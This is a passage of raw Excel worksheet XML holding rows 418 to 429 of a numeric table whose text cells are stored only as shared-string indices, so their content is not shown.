      </c>
      <c r="J418">
        <v>0</v>
      </c>
      <c r="K418">
        <v>3</v>
      </c>
      <c r="L418">
        <v>0</v>
      </c>
      <c r="M418">
        <v>0</v>
      </c>
      <c r="N418">
        <v>0</v>
      </c>
      <c r="O418">
        <v>0</v>
      </c>
      <c r="P418">
        <v>0</v>
      </c>
      <c r="Q418">
        <v>0</v>
      </c>
      <c r="R418">
        <v>0</v>
      </c>
      <c r="S418">
        <v>0</v>
      </c>
      <c r="T418">
        <v>1</v>
      </c>
      <c r="U418">
        <v>0</v>
      </c>
      <c r="V418">
        <v>20000</v>
      </c>
      <c r="W418">
        <v>0</v>
      </c>
      <c r="X418">
        <v>0</v>
      </c>
      <c r="Y418">
        <v>0</v>
      </c>
      <c r="Z418">
        <v>0</v>
      </c>
      <c r="AA418">
        <v>0</v>
      </c>
      <c r="AB418">
        <v>0</v>
      </c>
      <c r="AC418">
        <v>0</v>
      </c>
      <c r="AD418">
        <v>0</v>
      </c>
      <c r="AE418">
        <v>1200000</v>
      </c>
      <c r="AF418" t="s">
        <v>3442</v>
      </c>
      <c r="AG418">
        <v>15314</v>
      </c>
      <c r="AH418">
        <v>11</v>
      </c>
      <c r="AJ418">
        <v>273</v>
      </c>
      <c r="AK418" t="s">
        <v>3443</v>
      </c>
      <c r="AL418" t="s">
        <v>3443</v>
      </c>
      <c r="AM418" t="s">
        <v>3444</v>
      </c>
      <c r="AN418" t="s">
        <v>55</v>
      </c>
      <c r="AO418">
        <v>2002</v>
      </c>
      <c r="AP418" t="s">
        <v>3445</v>
      </c>
      <c r="AQ418" t="s">
        <v>3446</v>
      </c>
      <c r="AR418" t="s">
        <v>3447</v>
      </c>
      <c r="AS418" t="s">
        <v>553</v>
      </c>
      <c r="AT418" t="s">
        <v>58</v>
      </c>
      <c r="AU418">
        <v>21</v>
      </c>
      <c r="AV418">
        <v>1</v>
      </c>
      <c r="AW418">
        <v>0</v>
      </c>
      <c r="AX418">
        <v>0</v>
      </c>
      <c r="AY418">
        <v>100</v>
      </c>
      <c r="AZ418">
        <v>52</v>
      </c>
      <c r="BA418" t="s">
        <v>17476</v>
      </c>
      <c r="BB418" t="s">
        <v>15063</v>
      </c>
      <c r="BC418" t="s">
        <v>11904</v>
      </c>
      <c r="BD418">
        <v>0</v>
      </c>
    </row>
    <row r="419" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A419">
        <v>1134</v>
      </c>
      <c r="B419" t="s">
        <v>3448</v>
      </c>
      <c r="C419" t="s">
        <v>47</v>
      </c>
      <c r="D419" t="s">
        <v>3449</v>
      </c>
      <c r="E419" t="s">
        <v>101</v>
      </c>
      <c r="F419" t="s">
        <v>3450</v>
      </c>
      <c r="G419" s="1">
        <v>44106</v>
      </c>
      <c r="H419">
        <v>5777</v>
      </c>
      <c r="I419">
        <v>5777</v>
      </c>
      <c r="J419">
        <v>2</v>
      </c>
      <c r="K419">
        <v>0</v>
      </c>
      <c r="L419">
        <v>0</v>
      </c>
      <c r="M419">
        <v>3</v>
      </c>
      <c r="N419">
        <v>0</v>
      </c>
      <c r="O419">
        <v>0</v>
      </c>
      <c r="P419">
        <v>0</v>
      </c>
      <c r="Q419">
        <v>0</v>
      </c>
      <c r="R419">
        <v>0</v>
      </c>
      <c r="S419">
        <v>0</v>
      </c>
      <c r="T419">
        <v>0</v>
      </c>
      <c r="U419">
        <v>500000</v>
      </c>
      <c r="V419">
        <v>0</v>
      </c>
      <c r="W419">
        <v>0</v>
      </c>
      <c r="X419">
        <v>4500</v>
      </c>
      <c r="Y419">
        <v>0</v>
      </c>
      <c r="Z419">
        <v>0</v>
      </c>
      <c r="AA419">
        <v>0</v>
      </c>
      <c r="AB419">
        <v>0</v>
      </c>
      <c r="AC419">
        <v>0</v>
      </c>
      <c r="AD419">
        <v>0</v>
      </c>
      <c r="AE419">
        <v>0</v>
      </c>
      <c r="AF419" t="s">
        <v>3451</v>
      </c>
      <c r="AG419">
        <v>21332</v>
      </c>
      <c r="AH419">
        <v>2</v>
      </c>
      <c r="AJ419">
        <v>50</v>
      </c>
      <c r="AK419" t="s">
        <v>443</v>
      </c>
      <c r="AL419" t="s">
        <v>668</v>
      </c>
      <c r="AM419" t="s">
        <v>3452</v>
      </c>
      <c r="AN419" t="s">
        <v>55</v>
      </c>
      <c r="AO419">
        <v>2018</v>
      </c>
      <c r="AP419">
        <v>85373082134</v>
      </c>
      <c r="AQ419" t="s">
        <v>3453</v>
      </c>
      <c r="AR419" t="s">
        <v>3451</v>
      </c>
      <c r="AS419" t="s">
        <v>71</v>
      </c>
      <c r="AT419" t="s">
        <v>58</v>
      </c>
      <c r="AU419">
        <v>30</v>
      </c>
      <c r="AV419">
        <v>1</v>
      </c>
      <c r="AW419">
        <v>8</v>
      </c>
      <c r="AX419">
        <v>12</v>
      </c>
      <c r="AY419">
        <v>4</v>
      </c>
      <c r="AZ419">
        <v>4</v>
      </c>
      <c r="BA419" t="s">
        <v>16806</v>
      </c>
      <c r="BB419" t="s">
        <v>15072</v>
      </c>
      <c r="BC419" t="s">
        <v>9603</v>
      </c>
      <c r="BD419" t="s">
        <v>9509</v>
      </c>
    </row>
    <row r="420" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A420">
        <v>907</v>
      </c>
      <c r="B420" t="s">
        <v>3454</v>
      </c>
      <c r="C420" t="s">
        <v>790</v>
      </c>
      <c r="D420" t="s">
        <v>3455</v>
      </c>
      <c r="E420" t="s">
        <v>142</v>
      </c>
      <c r="F420" t="s">
        <v>3456</v>
      </c>
      <c r="G420" s="1">
        <v>44074</v>
      </c>
      <c r="H420">
        <v>5784</v>
      </c>
      <c r="I420">
        <v>5784</v>
      </c>
      <c r="J420">
        <v>1</v>
      </c>
      <c r="K420">
        <v>0</v>
      </c>
      <c r="L420">
        <v>5</v>
      </c>
      <c r="M420">
        <v>0</v>
      </c>
      <c r="N420">
        <v>0</v>
      </c>
      <c r="O420">
        <v>0</v>
      </c>
      <c r="P420">
        <v>0</v>
      </c>
      <c r="Q420">
        <v>2</v>
      </c>
      <c r="R420">
        <v>15</v>
      </c>
      <c r="S420">
        <v>0</v>
      </c>
      <c r="T420">
        <v>1</v>
      </c>
      <c r="U420">
        <v>100000</v>
      </c>
      <c r="V420">
        <v>0</v>
      </c>
      <c r="W420">
        <v>4000</v>
      </c>
      <c r="X420">
        <v>0</v>
      </c>
      <c r="Y420">
        <v>0</v>
      </c>
      <c r="Z420">
        <v>0</v>
      </c>
      <c r="AA420">
        <v>0</v>
      </c>
      <c r="AB420">
        <v>75</v>
      </c>
      <c r="AC420">
        <v>1200</v>
      </c>
      <c r="AD420">
        <v>0</v>
      </c>
      <c r="AE420">
        <v>10000</v>
      </c>
      <c r="AF420" t="s">
        <v>3457</v>
      </c>
      <c r="AG420">
        <v>93234</v>
      </c>
      <c r="AH420">
        <v>27</v>
      </c>
      <c r="AJ420">
        <v>438</v>
      </c>
      <c r="AK420" t="s">
        <v>793</v>
      </c>
      <c r="AL420" t="s">
        <v>794</v>
      </c>
      <c r="AM420" t="s">
        <v>3458</v>
      </c>
      <c r="AN420" t="s">
        <v>55</v>
      </c>
      <c r="AO420">
        <v>2012</v>
      </c>
      <c r="AP420">
        <v>81357909677</v>
      </c>
      <c r="AQ420" t="s">
        <v>3459</v>
      </c>
      <c r="AR420" t="s">
        <v>3457</v>
      </c>
      <c r="AS420" t="s">
        <v>71</v>
      </c>
      <c r="AT420" t="s">
        <v>58</v>
      </c>
      <c r="AU420">
        <v>26</v>
      </c>
      <c r="AV420">
        <v>0</v>
      </c>
      <c r="AW420">
        <v>9</v>
      </c>
      <c r="AX420">
        <v>3</v>
      </c>
      <c r="AY420">
        <v>5</v>
      </c>
      <c r="AZ420">
        <v>2</v>
      </c>
      <c r="BA420" t="s">
        <v>17501</v>
      </c>
      <c r="BB420" t="e">
        <v>#N/A</v>
      </c>
      <c r="BC420" t="s">
        <v>9536</v>
      </c>
      <c r="BD420">
        <v>0</v>
      </c>
    </row>
    <row r="421" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A421">
        <v>913</v>
      </c>
      <c r="B421" t="s">
        <v>3460</v>
      </c>
      <c r="C421" t="s">
        <v>168</v>
      </c>
      <c r="D421" t="s">
        <v>3461</v>
      </c>
      <c r="E421" t="s">
        <v>131</v>
      </c>
      <c r="F421" t="s">
        <v>3462</v>
      </c>
      <c r="G421" s="1">
        <v>44137</v>
      </c>
      <c r="H421">
        <v>5803</v>
      </c>
      <c r="I421">
        <v>5803</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t="s">
        <v>3463</v>
      </c>
      <c r="AG421">
        <v>17843</v>
      </c>
      <c r="AH421">
        <v>13</v>
      </c>
      <c r="AJ421">
        <v>176</v>
      </c>
      <c r="AK421" t="s">
        <v>2872</v>
      </c>
      <c r="AL421" t="s">
        <v>3464</v>
      </c>
      <c r="AM421" t="s">
        <v>3465</v>
      </c>
      <c r="AN421" t="s">
        <v>82</v>
      </c>
      <c r="AO421">
        <v>1990</v>
      </c>
      <c r="AP421">
        <v>218900782</v>
      </c>
      <c r="AQ421" t="s">
        <v>3466</v>
      </c>
      <c r="AR421" t="s">
        <v>3463</v>
      </c>
      <c r="AS421" t="s">
        <v>371</v>
      </c>
      <c r="AT421" t="s">
        <v>58</v>
      </c>
      <c r="AU421">
        <v>26</v>
      </c>
      <c r="AV421">
        <v>3</v>
      </c>
      <c r="AW421">
        <v>0</v>
      </c>
      <c r="AX421">
        <v>0</v>
      </c>
      <c r="AY421">
        <v>57</v>
      </c>
      <c r="AZ421">
        <v>14</v>
      </c>
      <c r="BA421" t="s">
        <v>17447</v>
      </c>
      <c r="BB421">
        <v>0</v>
      </c>
      <c r="BC421" t="s">
        <v>11909</v>
      </c>
      <c r="BD421" t="s">
        <v>11910</v>
      </c>
    </row>
    <row r="422" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A422">
        <v>901</v>
      </c>
      <c r="B422" t="s">
        <v>3467</v>
      </c>
      <c r="C422" t="s">
        <v>157</v>
      </c>
      <c r="D422" t="s">
        <v>3468</v>
      </c>
      <c r="E422" t="s">
        <v>49</v>
      </c>
      <c r="F422" t="s">
        <v>3469</v>
      </c>
      <c r="G422" s="1">
        <v>44155</v>
      </c>
      <c r="H422">
        <v>5818</v>
      </c>
      <c r="I422">
        <v>5818</v>
      </c>
      <c r="J422">
        <v>2</v>
      </c>
      <c r="K422">
        <v>4</v>
      </c>
      <c r="L422">
        <v>0</v>
      </c>
      <c r="M422">
        <v>0</v>
      </c>
      <c r="N422">
        <v>0</v>
      </c>
      <c r="O422">
        <v>0</v>
      </c>
      <c r="P422">
        <v>12</v>
      </c>
      <c r="Q422">
        <v>0</v>
      </c>
      <c r="R422">
        <v>0</v>
      </c>
      <c r="S422">
        <v>1</v>
      </c>
      <c r="T422">
        <v>1</v>
      </c>
      <c r="U422">
        <v>3000</v>
      </c>
      <c r="V422">
        <v>4</v>
      </c>
      <c r="W422">
        <v>0</v>
      </c>
      <c r="X422">
        <v>0</v>
      </c>
      <c r="Y422">
        <v>0</v>
      </c>
      <c r="Z422">
        <v>0</v>
      </c>
      <c r="AA422">
        <v>2880</v>
      </c>
      <c r="AB422">
        <v>0</v>
      </c>
      <c r="AC422">
        <v>0</v>
      </c>
      <c r="AD422">
        <v>1</v>
      </c>
      <c r="AE422">
        <v>64000</v>
      </c>
      <c r="AF422" t="s">
        <v>3470</v>
      </c>
      <c r="AG422">
        <v>61272</v>
      </c>
      <c r="AH422">
        <v>16</v>
      </c>
      <c r="AJ422">
        <v>242</v>
      </c>
      <c r="AK422" t="s">
        <v>1190</v>
      </c>
      <c r="AL422" t="s">
        <v>3471</v>
      </c>
      <c r="AM422" t="s">
        <v>3472</v>
      </c>
      <c r="AN422" t="s">
        <v>55</v>
      </c>
      <c r="AO422">
        <v>1987</v>
      </c>
      <c r="AP422" t="s">
        <v>3473</v>
      </c>
      <c r="AQ422" t="s">
        <v>3474</v>
      </c>
      <c r="AR422" t="s">
        <v>3475</v>
      </c>
      <c r="AS422" t="s">
        <v>71</v>
      </c>
      <c r="AT422" t="s">
        <v>58</v>
      </c>
      <c r="AU422">
        <v>26</v>
      </c>
      <c r="AV422">
        <v>1</v>
      </c>
      <c r="AW422">
        <v>89</v>
      </c>
      <c r="AX422">
        <v>142</v>
      </c>
      <c r="AY422">
        <v>38</v>
      </c>
      <c r="AZ422">
        <v>17</v>
      </c>
      <c r="BA422" t="s">
        <v>17502</v>
      </c>
      <c r="BB422" t="s">
        <v>14924</v>
      </c>
      <c r="BC422">
        <v>0</v>
      </c>
      <c r="BD422" t="s">
        <v>9752</v>
      </c>
    </row>
    <row r="423" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A423">
        <v>1202</v>
      </c>
      <c r="B423" t="s">
        <v>3476</v>
      </c>
      <c r="C423" t="s">
        <v>579</v>
      </c>
      <c r="D423" t="s">
        <v>3477</v>
      </c>
      <c r="E423" t="s">
        <v>142</v>
      </c>
      <c r="F423" t="s">
        <v>3478</v>
      </c>
      <c r="G423" s="1">
        <v>44095</v>
      </c>
      <c r="H423">
        <v>5843</v>
      </c>
      <c r="I423">
        <v>5843</v>
      </c>
      <c r="J423">
        <v>1</v>
      </c>
      <c r="K423">
        <v>0</v>
      </c>
      <c r="L423">
        <v>0</v>
      </c>
      <c r="M423">
        <v>5</v>
      </c>
      <c r="N423">
        <v>0</v>
      </c>
      <c r="O423">
        <v>0</v>
      </c>
      <c r="P423">
        <v>0</v>
      </c>
      <c r="Q423">
        <v>4</v>
      </c>
      <c r="R423">
        <v>15</v>
      </c>
      <c r="S423">
        <v>13</v>
      </c>
      <c r="T423">
        <v>0</v>
      </c>
      <c r="U423">
        <v>30000</v>
      </c>
      <c r="V423">
        <v>0</v>
      </c>
      <c r="W423">
        <v>0</v>
      </c>
      <c r="X423">
        <v>2419</v>
      </c>
      <c r="Y423">
        <v>0</v>
      </c>
      <c r="Z423">
        <v>0</v>
      </c>
      <c r="AA423">
        <v>0</v>
      </c>
      <c r="AB423">
        <v>2400</v>
      </c>
      <c r="AC423">
        <v>1800</v>
      </c>
      <c r="AD423">
        <v>186</v>
      </c>
      <c r="AE423">
        <v>0</v>
      </c>
      <c r="AF423" t="s">
        <v>3479</v>
      </c>
      <c r="AG423">
        <v>77371</v>
      </c>
      <c r="AH423">
        <v>23</v>
      </c>
      <c r="AJ423">
        <v>360</v>
      </c>
      <c r="AK423" t="s">
        <v>3480</v>
      </c>
      <c r="AL423" t="s">
        <v>3480</v>
      </c>
      <c r="AM423" t="s">
        <v>3481</v>
      </c>
      <c r="AN423" t="s">
        <v>55</v>
      </c>
      <c r="AO423">
        <v>2016</v>
      </c>
      <c r="AP423">
        <v>8112789806</v>
      </c>
      <c r="AQ423" t="s">
        <v>3482</v>
      </c>
      <c r="AR423" t="s">
        <v>3479</v>
      </c>
      <c r="AS423" t="s">
        <v>71</v>
      </c>
      <c r="AT423" t="s">
        <v>58</v>
      </c>
      <c r="AU423">
        <v>25</v>
      </c>
      <c r="AV423">
        <v>1</v>
      </c>
      <c r="AW423">
        <v>14</v>
      </c>
      <c r="AX423">
        <v>19</v>
      </c>
      <c r="AY423">
        <v>5</v>
      </c>
      <c r="AZ423">
        <v>6</v>
      </c>
      <c r="BA423" t="s">
        <v>16819</v>
      </c>
      <c r="BB423" t="s">
        <v>15119</v>
      </c>
      <c r="BC423" t="s">
        <v>11836</v>
      </c>
      <c r="BD423" t="s">
        <v>9509</v>
      </c>
    </row>
    <row r="424" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A424">
        <v>905</v>
      </c>
      <c r="B424" t="s">
        <v>3483</v>
      </c>
      <c r="C424" t="s">
        <v>157</v>
      </c>
      <c r="D424" t="s">
        <v>3484</v>
      </c>
      <c r="E424" t="s">
        <v>142</v>
      </c>
      <c r="F424" t="s">
        <v>3485</v>
      </c>
      <c r="G424" s="1">
        <v>44176</v>
      </c>
      <c r="H424">
        <v>5909</v>
      </c>
      <c r="I424">
        <v>5909</v>
      </c>
      <c r="J424">
        <v>0</v>
      </c>
      <c r="K424">
        <v>0</v>
      </c>
      <c r="L424">
        <v>2</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t="s">
        <v>3486</v>
      </c>
      <c r="AG424">
        <v>66382</v>
      </c>
      <c r="AH424">
        <v>16</v>
      </c>
      <c r="AJ424">
        <v>230</v>
      </c>
      <c r="AK424" t="s">
        <v>2692</v>
      </c>
      <c r="AL424" t="s">
        <v>2693</v>
      </c>
      <c r="AM424" t="s">
        <v>3487</v>
      </c>
      <c r="AN424" t="s">
        <v>55</v>
      </c>
      <c r="AO424">
        <v>2018</v>
      </c>
      <c r="AP424">
        <v>81316233280</v>
      </c>
      <c r="AQ424" t="s">
        <v>3488</v>
      </c>
      <c r="AR424" t="s">
        <v>3486</v>
      </c>
      <c r="AS424" t="s">
        <v>71</v>
      </c>
      <c r="AT424" t="s">
        <v>58</v>
      </c>
      <c r="AU424">
        <v>20</v>
      </c>
      <c r="AV424">
        <v>1</v>
      </c>
      <c r="AW424">
        <v>18</v>
      </c>
      <c r="AX424">
        <v>21</v>
      </c>
      <c r="AY424">
        <v>17</v>
      </c>
      <c r="AZ424">
        <v>20</v>
      </c>
      <c r="BA424" t="s">
        <v>17503</v>
      </c>
      <c r="BB424" t="s">
        <v>14928</v>
      </c>
      <c r="BC424" t="s">
        <v>10010</v>
      </c>
      <c r="BD424">
        <v>0</v>
      </c>
    </row>
    <row r="425" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A425">
        <v>1098</v>
      </c>
      <c r="B425" t="s">
        <v>3489</v>
      </c>
      <c r="C425" t="s">
        <v>74</v>
      </c>
      <c r="D425" t="s">
        <v>3490</v>
      </c>
      <c r="E425" t="s">
        <v>142</v>
      </c>
      <c r="F425" t="s">
        <v>3491</v>
      </c>
      <c r="G425" s="1">
        <v>43959</v>
      </c>
      <c r="H425">
        <v>5922</v>
      </c>
      <c r="I425">
        <v>5922</v>
      </c>
      <c r="J425">
        <v>3</v>
      </c>
      <c r="K425">
        <v>0</v>
      </c>
      <c r="L425">
        <v>3</v>
      </c>
      <c r="M425">
        <v>0</v>
      </c>
      <c r="N425">
        <v>10000</v>
      </c>
      <c r="O425">
        <v>0</v>
      </c>
      <c r="P425">
        <v>0</v>
      </c>
      <c r="Q425">
        <v>2</v>
      </c>
      <c r="R425">
        <v>15</v>
      </c>
      <c r="S425">
        <v>0</v>
      </c>
      <c r="T425">
        <v>0</v>
      </c>
      <c r="U425">
        <v>900000</v>
      </c>
      <c r="V425">
        <v>0</v>
      </c>
      <c r="W425">
        <v>300000</v>
      </c>
      <c r="X425">
        <v>0</v>
      </c>
      <c r="Y425">
        <v>0</v>
      </c>
      <c r="Z425">
        <v>0</v>
      </c>
      <c r="AA425">
        <v>0</v>
      </c>
      <c r="AB425">
        <v>2000</v>
      </c>
      <c r="AC425">
        <v>3000</v>
      </c>
      <c r="AD425">
        <v>0</v>
      </c>
      <c r="AE425">
        <v>0</v>
      </c>
      <c r="AF425" t="s">
        <v>3492</v>
      </c>
      <c r="AG425">
        <v>0</v>
      </c>
      <c r="AH425">
        <v>14</v>
      </c>
      <c r="AJ425">
        <v>220</v>
      </c>
      <c r="AK425" t="s">
        <v>2654</v>
      </c>
      <c r="AL425" t="s">
        <v>2655</v>
      </c>
      <c r="AM425" t="s">
        <v>3493</v>
      </c>
      <c r="AN425" t="s">
        <v>55</v>
      </c>
      <c r="AO425">
        <v>2016</v>
      </c>
      <c r="AP425" t="s">
        <v>3494</v>
      </c>
      <c r="AQ425" t="s">
        <v>3495</v>
      </c>
      <c r="AR425" t="s">
        <v>3496</v>
      </c>
      <c r="AS425" t="s">
        <v>71</v>
      </c>
      <c r="AT425" t="s">
        <v>58</v>
      </c>
      <c r="AU425">
        <v>6</v>
      </c>
      <c r="AV425">
        <v>0</v>
      </c>
      <c r="AW425">
        <v>31</v>
      </c>
      <c r="AX425">
        <v>55</v>
      </c>
      <c r="AY425">
        <v>6</v>
      </c>
      <c r="AZ425">
        <v>0</v>
      </c>
      <c r="BA425" t="s">
        <v>16801</v>
      </c>
      <c r="BB425" t="s">
        <v>15050</v>
      </c>
      <c r="BC425" t="s">
        <v>9496</v>
      </c>
      <c r="BD425" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="426" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A426">
        <v>1012</v>
      </c>
      <c r="B426" t="s">
        <v>3497</v>
      </c>
      <c r="C426" t="s">
        <v>318</v>
      </c>
      <c r="D426" t="s">
        <v>3498</v>
      </c>
      <c r="E426" t="s">
        <v>363</v>
      </c>
      <c r="F426" t="s">
        <v>3499</v>
      </c>
      <c r="G426" s="1">
        <v>44130</v>
      </c>
      <c r="H426">
        <v>5947</v>
      </c>
      <c r="I426">
        <v>5947</v>
      </c>
      <c r="J426">
        <v>0</v>
      </c>
      <c r="K426">
        <v>1</v>
      </c>
      <c r="L426">
        <v>0</v>
      </c>
      <c r="M426">
        <v>0</v>
      </c>
      <c r="N426">
        <v>0</v>
      </c>
      <c r="O426">
        <v>0</v>
      </c>
      <c r="P426">
        <v>0</v>
      </c>
      <c r="Q426">
        <v>0</v>
      </c>
      <c r="R426">
        <v>0</v>
      </c>
      <c r="S426">
        <v>0</v>
      </c>
      <c r="T426">
        <v>0</v>
      </c>
      <c r="U426">
        <v>0</v>
      </c>
      <c r="V426">
        <v>30000</v>
      </c>
      <c r="W426">
        <v>0</v>
      </c>
      <c r="X426">
        <v>0</v>
      </c>
      <c r="Y426">
        <v>0</v>
      </c>
      <c r="Z426">
        <v>0</v>
      </c>
      <c r="AA426">
        <v>0</v>
      </c>
      <c r="AB426">
        <v>0</v>
      </c>
      <c r="AC426">
        <v>0</v>
      </c>
      <c r="AD426">
        <v>0</v>
      </c>
      <c r="AE426">
        <v>0</v>
      </c>
      <c r="AF426" t="s">
        <v>3500</v>
      </c>
      <c r="AG426">
        <v>92254</v>
      </c>
      <c r="AH426">
        <v>26</v>
      </c>
      <c r="AJ426">
        <v>403</v>
      </c>
      <c r="AK426" t="s">
        <v>3501</v>
      </c>
      <c r="AL426" t="s">
        <v>3502</v>
      </c>
      <c r="AM426" t="s">
        <v>3503</v>
      </c>
      <c r="AN426" t="s">
        <v>68</v>
      </c>
      <c r="AO426">
        <v>2013</v>
      </c>
      <c r="AP426">
        <v>81340705388</v>
      </c>
      <c r="AQ426" t="s">
        <v>3504</v>
      </c>
      <c r="AR426" t="s">
        <v>3500</v>
      </c>
      <c r="AS426" t="s">
        <v>71</v>
      </c>
      <c r="AT426" t="s">
        <v>72</v>
      </c>
      <c r="AU426">
        <v>7</v>
      </c>
      <c r="AV426">
        <v>1</v>
      </c>
      <c r="AW426">
        <v>5</v>
      </c>
      <c r="AX426">
        <v>22</v>
      </c>
      <c r="AY426">
        <v>3</v>
      </c>
      <c r="AZ426">
        <v>2</v>
      </c>
      <c r="BA426">
        <v>0</v>
      </c>
      <c r="BB426" t="s">
        <v>14996</v>
      </c>
      <c r="BC426">
        <v>0</v>
      </c>
      <c r="BD426" t="s">
        <v>10075</v>
      </c>
    </row>
    <row r="427" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A427">
        <v>906</v>
      </c>
      <c r="B427" t="s">
        <v>3505</v>
      </c>
      <c r="C427" t="s">
        <v>458</v>
      </c>
      <c r="D427" t="s">
        <v>3506</v>
      </c>
      <c r="E427" t="s">
        <v>142</v>
      </c>
      <c r="F427" t="s">
        <v>2374</v>
      </c>
      <c r="G427" s="1">
        <v>44147</v>
      </c>
      <c r="H427">
        <v>5959</v>
      </c>
      <c r="I427">
        <v>5959</v>
      </c>
      <c r="J427">
        <v>0</v>
      </c>
      <c r="K427">
        <v>1</v>
      </c>
      <c r="L427">
        <v>0</v>
      </c>
      <c r="M427">
        <v>0</v>
      </c>
      <c r="N427">
        <v>0</v>
      </c>
      <c r="O427">
        <v>0</v>
      </c>
      <c r="P427">
        <v>0</v>
      </c>
      <c r="Q427">
        <v>0</v>
      </c>
      <c r="R427">
        <v>0</v>
      </c>
      <c r="S427">
        <v>0</v>
      </c>
      <c r="T427">
        <v>0</v>
      </c>
      <c r="U427">
        <v>0</v>
      </c>
      <c r="V427">
        <v>200000</v>
      </c>
      <c r="W427">
        <v>0</v>
      </c>
      <c r="X427">
        <v>0</v>
      </c>
      <c r="Y427">
        <v>0</v>
      </c>
      <c r="Z427">
        <v>0</v>
      </c>
      <c r="AA427">
        <v>0</v>
      </c>
      <c r="AB427">
        <v>0</v>
      </c>
      <c r="AC427">
        <v>0</v>
      </c>
      <c r="AD427">
        <v>0</v>
      </c>
      <c r="AE427">
        <v>0</v>
      </c>
      <c r="AF427" t="s">
        <v>3507</v>
      </c>
      <c r="AG427">
        <v>29432</v>
      </c>
      <c r="AH427">
        <v>5</v>
      </c>
      <c r="AJ427">
        <v>153</v>
      </c>
      <c r="AK427" t="s">
        <v>462</v>
      </c>
      <c r="AL427" t="s">
        <v>3508</v>
      </c>
      <c r="AM427" t="s">
        <v>3509</v>
      </c>
      <c r="AN427" t="s">
        <v>55</v>
      </c>
      <c r="AO427">
        <v>2014</v>
      </c>
      <c r="AP427">
        <v>8129588887</v>
      </c>
      <c r="AQ427" t="s">
        <v>3510</v>
      </c>
      <c r="AR427" t="s">
        <v>3507</v>
      </c>
      <c r="AS427" t="s">
        <v>179</v>
      </c>
      <c r="AT427" t="s">
        <v>58</v>
      </c>
      <c r="AU427">
        <v>26</v>
      </c>
      <c r="AV427">
        <v>0</v>
      </c>
      <c r="AW427">
        <v>2</v>
      </c>
      <c r="AX427">
        <v>0</v>
      </c>
      <c r="AY427">
        <v>1</v>
      </c>
      <c r="AZ427">
        <v>1</v>
      </c>
      <c r="BA427" t="s">
        <v>17467</v>
      </c>
      <c r="BB427" t="s">
        <v>14929</v>
      </c>
      <c r="BC427" t="s">
        <v>9638</v>
      </c>
      <c r="BD427">
        <v>0</v>
      </c>
    </row>
    <row r="428" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A428">
        <v>916</v>
      </c>
      <c r="B428" t="s">
        <v>3511</v>
      </c>
      <c r="C428" t="s">
        <v>1672</v>
      </c>
      <c r="D428" t="s">
        <v>3512</v>
      </c>
      <c r="E428" t="s">
        <v>142</v>
      </c>
      <c r="F428" t="s">
        <v>562</v>
      </c>
      <c r="G428" s="1">
        <v>44106</v>
      </c>
      <c r="H428">
        <v>6036</v>
      </c>
      <c r="I428">
        <v>6036</v>
      </c>
      <c r="J428">
        <v>2</v>
      </c>
      <c r="K428">
        <v>0</v>
      </c>
      <c r="L428">
        <v>0</v>
      </c>
      <c r="M428">
        <v>3</v>
      </c>
      <c r="N428">
        <v>0</v>
      </c>
      <c r="O428">
        <v>0</v>
      </c>
      <c r="P428">
        <v>0</v>
      </c>
      <c r="Q428">
        <v>6</v>
      </c>
      <c r="R428">
        <v>12</v>
      </c>
      <c r="S428">
        <v>0</v>
      </c>
      <c r="T428">
        <v>0</v>
      </c>
      <c r="U428">
        <v>60000</v>
      </c>
      <c r="V428">
        <v>0</v>
      </c>
      <c r="W428">
        <v>0</v>
      </c>
      <c r="X428">
        <v>2000</v>
      </c>
      <c r="Y428">
        <v>0</v>
      </c>
      <c r="Z428">
        <v>0</v>
      </c>
      <c r="AA428">
        <v>0</v>
      </c>
      <c r="AB428">
        <v>200</v>
      </c>
      <c r="AC428">
        <v>3000</v>
      </c>
      <c r="AD428">
        <v>0</v>
      </c>
      <c r="AE428">
        <v>0</v>
      </c>
      <c r="AF428" t="s">
        <v>3513</v>
      </c>
      <c r="AG428">
        <v>70852</v>
      </c>
      <c r="AH428">
        <v>22</v>
      </c>
      <c r="AJ428">
        <v>343</v>
      </c>
      <c r="AK428" t="s">
        <v>3514</v>
      </c>
      <c r="AL428" t="s">
        <v>3515</v>
      </c>
      <c r="AM428" t="s">
        <v>3516</v>
      </c>
      <c r="AN428" t="s">
        <v>55</v>
      </c>
      <c r="AO428">
        <v>2000</v>
      </c>
      <c r="AP428">
        <v>5114777300</v>
      </c>
      <c r="AQ428" t="s">
        <v>3517</v>
      </c>
      <c r="AR428" t="s">
        <v>3518</v>
      </c>
      <c r="AS428" t="s">
        <v>71</v>
      </c>
      <c r="AT428" t="s">
        <v>58</v>
      </c>
      <c r="AU428">
        <v>312</v>
      </c>
      <c r="AV428">
        <v>1</v>
      </c>
      <c r="AW428">
        <v>4</v>
      </c>
      <c r="AX428">
        <v>5</v>
      </c>
      <c r="AY428">
        <v>7</v>
      </c>
      <c r="AZ428">
        <v>8</v>
      </c>
      <c r="BA428" t="s">
        <v>17520</v>
      </c>
      <c r="BB428" t="s">
        <v>14934</v>
      </c>
      <c r="BC428">
        <v>0</v>
      </c>
      <c r="BD428" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="429" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A429">
        <v>1129</v>
      </c>
      <c r="B429" t="s">
        <v>3519</v>
      </c>
      <c r="C429" t="s">
        <v>157</v>
      </c>
      <c r="D429" t="s">
        <v>3520</v>
      </c>
      <c r="E429" t="s">
        <v>3521</v>
      </c>
      <c r="F429" t="s">
        <v>3522</v>
      </c>
      <c r="G429" s="1">
        <v>44287</v>
      </c>
      <c r="H429">
        <v>6062</v>
      </c>
      <c r="I429">
        <v>6062</v>
      </c>
      <c r="J429">
        <v>0</v>
      </c>
      <c r="K429">
        <v>1</v>
      </c>
      <c r="L429">
        <v>0</v>
      </c>
      <c r="M429">
        <v>0</v>
      </c>
      <c r="N429">
        <v>0</v>
      </c>
      <c r="O429">
        <v>0</v>
      </c>
      <c r="P429">
        <v>0</v>
      </c>
      <c r="Q429">
        <v>0</v>
      </c>
      <c r="R429">
        <v>8</v>
      </c>
      <c r="S429">
        <v>0</v>
      </c>
      <c r="T429">
